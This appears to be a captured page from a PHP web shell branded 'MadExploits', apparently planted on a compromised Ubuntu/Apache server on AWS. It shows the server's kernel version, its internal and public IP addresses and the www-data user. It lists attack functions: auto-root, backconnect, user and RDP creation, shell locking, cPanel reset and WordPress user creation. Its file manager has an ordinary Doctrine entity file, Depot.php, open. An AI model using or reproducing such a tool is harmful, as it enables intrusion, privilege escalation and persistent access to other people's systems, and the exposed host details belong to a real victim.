Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.16.139.36
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
src /
Entity /
[ HOME SHELL ]
Name
Size
Permission
Action
Cargo.php
3.6
KB
-rw-rw-r--
Depot.php
1.12
KB
-rw-rw-r--
Loading.php
4.95
KB
-rw-rw-r--
ReleaseOrder.php
9.39
KB
-rw-rw-r--
Subcargo.php
2.86
KB
-rw-rw-r--
User.php
4.86
KB
-rw-rw-r--
UserDepot.php
1.61
KB
-rw-rw-r--
googleda794cd9937527d01.html
29
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Depot.php
<?php namespace App\Entity; use App\Repository\DepotRepository; use Doctrine\Common\Collections\ArrayCollection; use Doctrine\Common\Collections\Collection; use Doctrine\ORM\Mapping as ORM; /** * @ORM\Entity(repositoryClass=DepotRepository::class) */ class Depot { /** * @ORM\Id * @ORM\GeneratedValue * @ORM\Column(type="integer") */ private $id; /** * @ORM\Column(type="string", length=50) */ private $name; /** * @ORM\Column(type="string", length=255, nullable=true) */ private $location; public function __construct() { $this->loadings = new ArrayCollection(); } public function getId(): ?int { return $this->id; } public function getName(): ?string { return $this->name; } public function setName(string $name): self { $this->name = $name; return $this; } public function getLocation(): ?string { return $this->location; } public function setLocation(?string $location): self { $this->location = $location; return $this; } }
Close